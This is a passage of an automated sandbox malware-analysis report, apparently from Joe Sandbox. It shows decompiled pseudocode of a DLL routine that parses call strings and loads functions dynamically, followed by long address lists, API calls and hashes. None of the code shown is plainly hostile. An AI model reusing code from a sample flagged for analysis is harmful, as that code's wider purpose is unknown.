								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L40;
								}
								goto L28;
							}
						} else {
							if(_t206 == 1) {
								_t248 = _v16;
								if(_v40 == _t284) {
									_t248 = _t248 - 1;
								}
								 *(_t319 + 0x1014) = _t248;
							}
							L40:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L64:
							if(_v32 != 0xffffffff) {
								_t309 = _v12;
								continue;
							}
							break;
						}
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L41:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L62:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L63:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L64;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L132:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L135:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L142:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L63;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L142;
										}
										_v36 = 1;
										L138:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L62;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L135;
									}
									_v36 = 3;
									goto L138;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L142;
								}
								goto L132;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L75:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L62;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L117;
											}
											L116:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L121:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L92;
											}
											L117:
											__eflags = __ax;
											if(__ax == 0) {
												goto L121;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L117;
											}
											goto L116;
										}
									case 1:
										_v8 = 1;
										goto L62;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L62;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L80;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L62;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L92;
									case 5:
										L100:
										_v20 = _v20 + 1;
										goto L62;
									case 6:
										_push(7);
										goto L108;
									case 7:
										_push(0x19);
										goto L128;
									case 8:
										_push(0x15);
										goto L128;
									case 9:
										_push(0x16);
										goto L128;
									case 0xa:
										_push(0x18);
										goto L128;
									case 0xb:
										_push(5);
										goto L108;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L86;
									case 0xd:
										_push(6);
										goto L108;
									case 0xe:
										_push(2);
										goto L108;
									case 0xf:
										_push(3);
										goto L108;
									case 0x10:
										_push(0x17);
										L128:
										_pop(__ebx);
										goto L93;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L92;
									case 0x12:
										__ebx = 0xffffffff;
										goto L93;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L86;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L86;
									case 0x15:
										_push(4);
										L108:
										_pop(__eax);
										L86:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L88:
											__ecx = __edx;
											L89:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L92;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L89;
										}
										goto L88;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L80:
											_v40 = 1;
										}
										goto L62;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L92:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L62;
										}
										L93:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L98:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L100;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L96:
											__eax = GlobalFree(__eax);
											L97:
											 *__edi = __ebx;
											goto L98;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L97;
										}
										goto L96;
									case 0x18:
										goto L62;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L75;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L142;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L62;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L58:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L62;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L57:
								_pop(1);
								goto L58;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L57;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L57;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L57;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L62;
							}
							_push(0x40);
							goto L57;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L41;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L162:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L151:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L158:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L146:
										 *(_t319 + 0x100c) = _t220;
										goto L162;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L160:
									if(__eflags != 0) {
										goto L162;
									}
									L161:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L162;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L162;
									}
									goto L158;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L161;
							}
							goto L151;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L160;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L162;
						}
						_t220 = E10001311(_t229);
						L145:
						goto L146;
					}
					if(_t228 != 1) {
						goto L162;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L161;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L145;
				}
			}
































































                                                    0x10001b20
                                                    0x10001b23
                                                    0x10001b26
                                                    0x10001b29
                                                    0x10001b2c
                                                    0x10001b2f
                                                    0x10001b32
                                                    0x10001b34
                                                    0x10001b37
                                                    0x10001b3c
                                                    0x10001b3f
                                                    0x10001b47
                                                    0x10001b4f
                                                    0x10001b51
                                                    0x10001b54
                                                    0x10001b5c
                                                    0x10001b5c
                                                    0x10001b61
                                                    0x10001b64
                                                    0x00000000
                                                    0x00000000
                                                    0x10001b6e
                                                    0x10001b71
                                                    0x10001b76
                                                    0x10001b78
                                                    0x10001beb
                                                    0x10001beb
                                                    0x10001beb
                                                    0x10001bef
                                                    0x10001bf2
                                                    0x10001bf4
                                                    0x10001c16
                                                    0x10001c18
                                                    0x10001c1b
                                                    0x10001c24
                                                    0x10001c2a
                                                    0x10001c2c
                                                    0x10001c32
                                                    0x10001c32
                                                    0x10001c38
                                                    0x10001c3b
                                                    0x10001c3b
                                                    0x10001c3e
                                                    0x10001c3e
                                                    0x10001c44
                                                    0x10001c46
                                                    0x10001c46
                                                    0x10001c48
                                                    0x10001c4b
                                                    0x10001c4e
                                                    0x10001c54
                                                    0x10001c5a
                                                    0x10001c5d
                                                    0x10001c81
                                                    0x10001c84
                                                    0x00000000
                                                    0x00000000
                                                    0x10001c87
                                                    0x10001c89
                                                    0x10001c97
                                                    0x10001c9a
                                                    0x10001c9c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10001c9e
                                                    0x10001c9e
                                                    0x10001c9e
                                                    0x10001ca4
                                                    0x10001ca6
                                                    0x00000000
                                                    0x00000000
                                                    0x10001ca8
                                                    0x10001caa
                                                    0x10001cac
                                                    0x10001cae
                                                    0x10001caf
                                                    0x10001caf
                                                    0x10001cb0
                                                    0x10001cb2
                                                    0x10001cb4
                                                    0x10001cb4
                                                    0x10001cba
                                                    0x10001cc0
                                                    0x10001cc2
                                                    0x10001cd6
                                                    0x10001cd6
                                                    0x10001cd8
                                                    0x10001cc4
                                                    0x10001cca
                                                    0x10001ccd
                                                    0x10001ccd
                                                    0x00000000
                                                    0x10001c5f
                                                    0x10001c5f
                                                    0x10001c5f
                                                    0x10001c60
                                                    0x10001c68
                                                    0x10001c6c
                                                    0x10001c72
                                                    0x10001c76
                                                    0x00000000
                                                    0x10001c76
                                                    0x10001c62
                                                    0x10001c62
                                                    0x10001c63
                                                    0x00000000
                                                    0x00000000
                                                    0x10001c65
                                                    0x10001c66
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10001c66
                                                    0x10001bf6
                                                    0x10001bf7
                                                    0x10001c00
                                                    0x10001c03
                                                    0x10001c10
                                                    0x10001c10
                                                    0x10001c05
                                                    0x10001c05
                                                    0x10001cde
                                                    0x10001ce1
                                                    0x10001ce5
                                                    0x10001d70
                                                    0x10001d74
                                                    0x10001b59
                                                    0x00000000
                                                    0x10001b59
                                                    0x00000000
                                                    0x10001d74
                                                    0x10001bf4
                                                    0x10001b7a
                                                    0x10001b7d
                                                    0x10001bce
                                                    0x10001bd1
                                                    0x10001be3
                                                    0x10001be3
                                                    0x10001be6
                                                    0x00000000
                                                    0x10001be6
                                                    0x10001bd3
                                                    0x10001bd8
                                                    0x00000000
                                                    0x00000000
                                                    0x10001bda
                                                    0x10001bdd
                                                    0x10001ced
                                                    0x10001cf0
                                                    0x10001cf0
                                                    0x10001cf2
                                                    0x10002048
                                                    0x1000204b
                                                    0x100020b2
                                                    0x10001d60
                                                    0x10001d63
                                                    0x10001d66
                                                    0x10001d69
                                                    0x10001d69
                                                    0x10001d6b
                                                    0x10001d6c
                                                    0x10001d6c
                                                    0x10001d6d
                                                    0x00000000
                                                    0x10001d6d
                                                    0x1000204d
                                                    0x10002050
                                                    0x10002057
                                                    0x10002057
                                                    0x1000205b
                                                    0x1000206f
                                                    0x1000206f
                                                    0x10002072
                                                    0x10002076
                                                    0x100020be
                                                    0x100020c1
                                                    0x100020c5
                                                    0x00000000
                                                    0x100020c5
                                                    0x10002078
                                                    0x1000207c
                                                    0x00000000
                                                    0x00000000
                                                    0x1000207e
                                                    0x10002085
                                                    0x10002085
                                                    0x1000208b
                                                    0x1000208e
                                                    0x100020aa
                                                    0x10002090
                                                    0x10002099
                                                    0x1000209c
                                                    0x1000209c
                                                    0x00000000
                                                    0x1000208e
                                                    0x1000205d
                                                    0x10002060
                                                    0x10002064
                                                    0x00000000
                                                    0x00000000
                                                    0x10002066
                                                    0x00000000
                                                    0x10002066
                                                    0x10002052
                                                    0x10002055
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10002055
                                                    0x10001cf8
                                                    0x10001cf8
                                                    0x10001cf9
                                                    0x10001e29
                                                    0x10001e29
                                                    0x10001e2e
                                                    0x10001e31
                                                    0x00000000
                                                    0x00000000
                                                    0x10001e3e
                                                    0x00000000
                                                    0x10001fe5
                                                    0x10001fe8
                                                    0x10001feb
                                                    0x10001feb
                                                    0x10001fec
                                                    0x10001fed
                                                    0x10001ff0
                                                    0x10001ff3
                                                    0x10001ff6
                                                    0x00000000
                                                    0x00000000
                                                    0x10001ff8
                                                    0x10001ff8
                                                    0x10001ffc
                                                    0x10002014
                                                    0x10002017
                                                    0x10002021
                                                    0x00000000
                                                    0x10002021
                                                    0x10001ffe
                                                    0x10001ffe
                                                    0x10002001
                                                    0x00000000
                                                    0x00000000
                                                    0x10002003
                                                    0x10002006
                                                    0x10002008
                                                    0x10002009
                                                    0x10002009
                                                    0x10002009
                                                    0x1000200a
                                                    0x1000200d
                                                    0x10002010
                                                    0x10002011
                                                    0x10001feb
                                                    0x10001fec
                                                    0x10001fed
                                                    0x10001ff0
                                                    0x10001ff3
                                                    0x10001ff6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10001ff6
                                                    0x00000000
                                                    0x10001e85
                                                    0x00000000
                                                    0x00000000
                                                    0x10001e91
                                                    0x00000000
                                                    0x00000000
                                                    0x10001e78
                                                    0x10001e7c
                                                    0x10001e80
                                                    0x00000000
                                                    0x00000000
                                                    0x10001fb6
                                                    0x10001fba
                                                    0x00000000
                                                    0x00000000
                                                    0x10001fc0
                                                    0x10001fc9
                                                    0x10001fd0
                                                    0x10001fd8
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f53
                                                    0x10001f53
                                                    0x00000000
                                                    0x00000000
                                                    0x10001e9a
                                                    0x00000000
                                                    0x00000000
                                                    0x10002040
                                                    0x00000000
                                                    0x00000000
                                                    0x10002030
                                                    0x00000000
                                                    0x00000000
                                                    0x10002034
                                                    0x00000000
                                                    0x00000000
                                                    0x1000203c
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f76
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f5b
                                                    0x10001f5d
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f7e
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f63
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f67
                                                    0x00000000
                                                    0x00000000
                                                    0x10002038
                                                    0x10002042
                                                    0x10002042
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f86
                                                    0x10001f8a
                                                    0x10001f8f
                                                    0x10001f92
                                                    0x10001f93
                                                    0x10001f96
                                                    0x10001f9c
                                                    0x10001f9c
                                                    0x00000000
                                                    0x00000000
                                                    0x10002028
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f6b
                                                    0x10001f6e
                                                    0x10001f70
                                                    0x00000000
                                                    0x00000000
                                                    0x10001ea1
                                                    0x10001ea1
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f7a
                                                    0x10001f80
                                                    0x10001f80
                                                    0x10001ea3
                                                    0x10001ea3
                                                    0x10001ea6
                                                    0x10001ead
                                                    0x10001eb0
                                                    0x10001eb2
                                                    0x10001eb4
                                                    0x10001eb5
                                                    0x10001eb9
                                                    0x10001ebc
                                                    0x10001ec2
                                                    0x10001ec8
                                                    0x10001ec8
                                                    0x10001eca
                                                    0x10001eca
                                                    0x10001ecd
                                                    0x10001ed3
                                                    0x10001ed5
                                                    0x10001ed9
                                                    0x10001ede
                                                    0x10001ede
                                                    0x10001ee0
                                                    0x10001ee0
                                                    0x10001ee3
                                                    0x10001ee6
                                                    0x10001eef
                                                    0x10001ef5
                                                    0x10001ef8
                                                    0x10001ef8
                                                    0x10001efa
                                                    0x10001efd
                                                    0x10001f03
                                                    0x00000000
                                                    0x10001f03
                                                    0x10001ec4
                                                    0x10001ec6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10001e45
                                                    0x10001e4b
                                                    0x10001e4e
                                                    0x10001e50
                                                    0x10001e50
                                                    0x10001e53
                                                    0x10001e57
                                                    0x10001e64
                                                    0x10001e66
                                                    0x10001e6c
                                                    0x10001e6c
                                                    0x10001e6c
                                                    0x00000000
                                                    0x00000000
                                                    0x10001fa4
                                                    0x10001fa8
                                                    0x10001fad
                                                    0x10001fb0
                                                    0x10001f09
                                                    0x10001f09
                                                    0x10001f0b
                                                    0x00000000
                                                    0x00000000
                                                    0x10001f11
                                                    0x10001f11
                                                    0x10001f15
                                                    0x10001f1c
                                                    0x10001f40
                                                    0x10001f40
                                                    0x10001f44
                                                    0x10001f46
                                                    0x10001f49
                                                    0x10001f49
                                                    0x10001f4c
                                                    0x10001f4c
                                                    0x00000000
                                                    0x10001f44
                                                    0x10001f21
                                                    0x10001f24
                                                    0x10001f24
                                                    0x10001f2b
                                                    0x10001f2d
                                                    0x10001f30
                                                    0x10001f37
                                                    0x10001f38
                                                    0x10001f3e
                                                    0x10001f3e
                                                    0x00000000
                                                    0x10001f3e
                                                    0x10001f32
                                                    0x10001f35
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10001e3e
                                                    0x10001cff
                                                    0x10001cff
                                                    0x10001d00
                                                    0x10001e26
                                                    0x00000000
                                                    0x10001e26
                                                    0x10001d06
                                                    0x10001d07
                                                    0x00000000
                                                    0x00000000
                                                    0x10001d0f
                                                    0x10001d0f
                                                    0x10001d12
                                                    0x10001d5d
                                                    0x00000000
                                                    0x10001d5d
                                                    0x10001d14
                                                    0x10001d14
                                                    0x10001d17
                                                    0x10001d41
                                                    0x10001d44
                                                    0x10001d47
                                                    0x10001e18
                                                    0x10001e18
                                                    0x10001e18
                                                    0x10001d4d
                                                    0x10001d4d
                                                    0x10001d4d
                                                    0x10001e1e
                                                    0x00000000
                                                    0x10001e1e
                                                    0x10001d1a
                                                    0x10001d1a
                                                    0x10001d1b
                                                    0x10001d3e
                                                    0x10001d40
                                                    0x10001d40
                                                    0x00000000
                                                    0x10001d40
                                                    0x10001d1d
                                                    0x10001d1d
                                                    0x10001d20
                                                    0x10001d3a
                                                    0x00000000
                                                    0x10001d3a
                                                    0x10001d22
                                                    0x10001d22
                                                    0x10001d25
                                                    0x10001d36
                                                    0x00000000
                                                    0x10001d36
                                                    0x10001d27
                                                    0x10001d27
                                                    0x10001d28
                                                    0x10001d32
                                                    0x00000000
                                                    0x10001d32
                                                    0x10001d2b
                                                    0x10001d2c
                                                    0x00000000
                                                    0x00000000
                                                    0x10001d2e
                                                    0x00000000
                                                    0x10001d2e
                                                    0x00000000
                                                    0x10001bdd
                                                    0x10001b7f
                                                    0x10001b82
                                                    0x10001bb1
                                                    0x10001bb5
                                                    0x10001bbc
                                                    0x10001bc3
                                                    0x10001bc6
                                                    0x10001bc9
                                                    0x00000000
                                                    0x10001bc9
                                                    0x10001b84
                                                    0x10001b85
                                                    0x10001ba0
                                                    0x10001ba7
                                                    0x10001baa
                                                    0x00000000
                                                    0x10001baa
                                                    0x10001b8a
                                                    0x00000000
                                                    0x10001b90
                                                    0x10001b90
                                                    0x10001b97
                                                    0x00000000
                                                    0x10001b97
                                                    0x10001b8a
                                                    0x10001d83
                                                    0x10001d88
                                                    0x10001d8d
                                                    0x10001d91
                                                    0x100021c5
                                                    0x100021cb
                                                    0x10001da3
                                                    0x10001da5
                                                    0x10001da6
                                                    0x100020ee
                                                    0x100020ee
                                                    0x100020f1
                                                    0x100020f4
                                                    0x10002111
                                                    0x10002117
                                                    0x10002119
                                                    0x1000211f
                                                    0x10002136
                                                    0x10002136
                                                    0x10002136
                                                    0x10002143
                                                    0x10002149
                                                    0x1000214c
                                                    0x10002152
                                                    0x10002154
                                                    0x10002158
                                                    0x1000215a
                                                    0x10002161
                                                    0x10002166
                                                    0x10002169
                                                    0x1000216b
                                                    0x10002170
                                                    0x10002182
                                                    0x10002182
                                                    0x10002170
                                                    0x10002169
                                                    0x10002158
                                                    0x10002188
                                                    0x1000218b
                                                    0x10002195
                                                    0x1000219d
                                                    0x100021aa
                                                    0x100021b0
                                                    0x100021b3
                                                    0x100020e3
                                                    0x100020e3
                                                    0x00000000
                                                    0x100020e3
                                                    0x100021b9
                                                    0x100021bf
                                                    0x100021bf
                                                    0x00000000
                                                    0x00000000
                                                    0x100021c1
                                                    0x100021c1
                                                    0x100021c1
                                                    0x100021c1
                                                    0x00000000
                                                    0x1000218d
                                                    0x1000218d
                                                    0x10002193
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10002193
                                                    0x1000218b
                                                    0x10002122
                                                    0x10002128
                                                    0x1000212a
                                                    0x10002130
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x10002130
                                                    0x100020f6
                                                    0x100020fd
                                                    0x10002103
                                                    0x10002109
                                                    0x00000000
                                                    0x10002109
                                                    0x10001dac
                                                    0x10001dad
                                                    0x100020cd
                                                    0x100020cd
                                                    0x100020d3
                                                    0x100020d6
                                                    0x00000000
                                                    0x00000000
                                                    0x100020dd
                                                    0x100020e2
                                                    0x00000000
                                                    0x100020e2
                                                    0x10001db4
                                                    0x00000000
                                                    0x00000000
                                                    0x10001dba
                                                    0x10001dba
                                                    0x10001dc3
                                                    0x10001dc8
                                                    0x10001dce
                                                    0x00000000
                                                    0x00000000
                                                    0x10001dd4
                                                    0x10001de1
                                                    0x10001de7
                                                    0x10001df1
                                                    0x10001df7
                                                    0x10001dff
                                                    0x10001e0f
                                                    0x00000000
                                                    0x10001e0f

                                                    APIs
                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                    • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                    • GlobalFree.KERNEL32(?), ref: 10001D83
                                                    • GlobalFree.KERNEL32(?), ref: 10001D88
                                                    • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                    • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                    • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                    • String ID:
                                                    • API String ID: 4227406936-0
                                                    • Opcode ID: 08718dd5a2a9ba0eb858fb5d8d82d0bb671c99668cd07d3aae6b7a667fc6b2a8
                                                    • Instruction ID: ddba556cbcfd12cc623088a643b6bc1a92fa7d128f9acb7523efc58371f8d47b
                                                    • Opcode Fuzzy Hash: 08718dd5a2a9ba0eb858fb5d8d82d0bb671c99668cd07d3aae6b7a667fc6b2a8
                                                    • Instruction Fuzzy Hash: A1129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
